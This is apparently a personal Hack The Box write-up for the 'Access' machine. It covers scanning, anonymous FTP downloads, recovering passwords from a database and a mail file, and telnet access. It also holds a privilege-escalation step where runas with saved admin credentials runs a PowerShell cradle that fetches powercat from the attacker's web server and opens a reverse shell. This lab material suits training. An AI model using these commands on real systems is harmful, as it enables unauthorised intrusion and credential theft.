HTB Access done
Access
OS:
Windows
Technology:
IP Address:
10.10.10.98
Open ports:
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
80/tcp open http Microsoft IIS httpd 7.5
Users and pass:
From file: backup.mdb
L: admin
P: admin
___
L: engineer
P: access4u@security
L: backup_admin
P: admin
---
Password for file: Access_Control.zip
P: access4u@security
---
From file: Access Control.pst
L: security
P: 4Cc3ssC0ntr0ller
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.98_nmap 10.10.10.98 ; cat 10.10.10.98_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 22:10 UTC
Nmap scan report for 10.10.10.98
Host is up (0.040s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet Microsoft Windows XP telnetd
|_telnet-ntlm-info: ERROR: Script execution failed (use -d to debug)
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Ffuz: http://10.10.10.98
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ ffuf -u http://10.10.10.98/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.10.98_ffuz -of all -e .php,.html,.txt,.bac,.backu,.asp,.aspx
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.98/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backu .asp .aspx
:: Output file : 10.10.10.98_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.html [Status: 200, Size: 391, Words: 23, Lines: 15, Duration: 45ms]
aspnet_client [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 51ms]
[INFO] Adding a new job to the queue: http://10.10.10.98/aspnet_client/FUZZ
index.html [Status: 200, Size: 391, Words: 23, Lines: 15, Duration: 42ms]
[INFO] Starting queued job on target: http://10.10.10.98/aspnet_client/FUZZ
system_web [Status: 301, Size: 167, Words: 9, Lines: 2, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.98/aspnet_client/system_web/
:: Progress: [163752/163752] :: Job [2/2] :: 873 req/sec :: Duration: [0:03:33] :: Errors: 0 ::
Download files from ftp
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ ftp -A ftp://anonymous:[email protected]
Connected to 10.10.10.98.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> ls -la
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************| 5520 KiB 924.11 KiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:05 (924.05 KiB/s)
ftp> cd ../Engineer
250 CWD command successful.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************| 10870 64.59 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (64.46 KiB/s)
ftp> exit
221 Goodbye.
Cracking password for zip file: Access_Control.zip
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ zip2john Access_Control.zip > Access_Control.john
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ john Access_Control.john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
Cost 1 (HMAC size) is 10650 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:35 DONE (2024-08-19 13:28) 0g/s 27816p/s 27816c/s 27816C/s !Sketchy!..*7¡Vamos!
Session completed.
Open file: backup.mdb
Open file via website https://www.mdbopener.com/ and download as zip file
---
┌──(kali㉿kali)-[~/…/HTB/HTB_Access/ftp/backup.mdb.zip_folder]
└─$ cat auth_user.csv
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
Unzip archive: Access_Control.zip with password
I use password: access4u@security from last step
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ 7z x Access_Control.zip
7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
64-bit locale=en_US.UTF-8 Threads:4 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access_Control.zip
--
Path = Access_Control.zip
Type = zip
Physical Size = 10870
Would you like to replace the existing file:
Path: ./Access Control.pst
Size: 0 bytes
Modified: 2018-08-24 00:13:52
with the file from archive:
Path: Access Control.pst
Size: 271360 bytes (265 KiB)
Modified: 2018-08-24 00:13:52
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ ls
Access_Control.john Access_Control.zip backup.mdb.zip
'Access Control.pst' backup.mdb backup.mdb.zip_folder
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
Open file: Access Control.pst
Read info about change password for security account:
4Cc3ssC0ntr0ller
Read flag: user.txt
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Access/ftp]
└─$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM <DIR> .
08/28/2018 07:51 AM <DIR> ..
08/18/2024 10:45 PM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 847,003,648 bytes free
C:\Users\security\Desktop>type user.txt
06549caadb5dda66df897628ca94db87
C:\Users\security\Desktop>i
'i' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\security\Desktop>whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==========================================
access\security S-1-5-21-953262931-566350628-63446256-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
ACCESS\TelnetClients Alias S-1-5-21-953262931-566350628-63446256-1000 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\security\Desktop>net user security
User name security
Full Name security
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/22/2018 10:14:57 PM
Password expires Never
Password changeable 8/22/2018 10:14:57 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/19/2024 2:59:25 PM
Logon hours allowed All
Local Group Memberships *TelnetClients *Users
Global Group memberships *None
The command completed successfully.
C:\Users\security\Desktop>u
'u' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\security\Desktop>ifconfig
'ifconfig' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\security\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::4db:8516:b9e6:5500
Link-local IPv6 Address . . . . . : fe80::4db:8516:b9e6:5500%11
IPv4 Address. . . . . . . . . . . : 10.10.10.98
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{851F7B02-1B91-4636-BB2A-AAC45E5735BC}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\security\Desktop>
Privilege Escalation
Read content from: "C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk"
I found info that admin creds are cached
C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe
---
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
�wN���]N�D.��Q���`�Xaccess�_���8{E�3
O�j)�H���
)ΰ[�_���8{E�3
O�j)�H���
)ΰ[� ��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
Create a revshell
Copy powercat.ps1
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
Start python webserver
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [19/Aug/2024 23:00:42] "GET /powercat.ps1 HTTP/1.1" 200 -
Start revshell - powercat.ps1
C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.25/powercat.ps1') ; powercat -c 10.10.14.25 -p 443 -e cmd"
Start netcat
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Access]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.98] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\administrator
Read flag: root.txt
C:\Windows\system32>cd C;
cd C;
The system cannot find the path specified.
C:\Windows\system32>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users
08/21/2018 11:31 PM <DIR> .
08/21/2018 11:31 PM <DIR> ..
08/24/2018 12:46 AM <DIR> Administrator
07/14/2009 05:57 AM <DIR> Public
08/23/2018 11:52 PM <DIR> security
0 File(s) 0 bytes
5 Dir(s) 846,954,496 bytes free
C:\Users>cd Administrator\Desktop
cd Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:40 PM <DIR> .
07/14/2021 03:40 PM <DIR> ..
08/18/2024 10:45 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 846,954,496 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ca8bbaf3ffb640f259fdbf27139e1cc7
C:\Users\Administrator\Desktop>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
==================== =========================================
access\administrator S-1-5-21-953262931-566350628-63446256-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeLockMemoryPrivilege Lock pages in memory Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::4db:8516:b9e6:5500%11
IPv4 Address. . . . . . . . . . . : 10.10.10.98
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{851F7B02-1B91-4636-BB2A-AAC45E5735BC}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>
References
Lessons Learned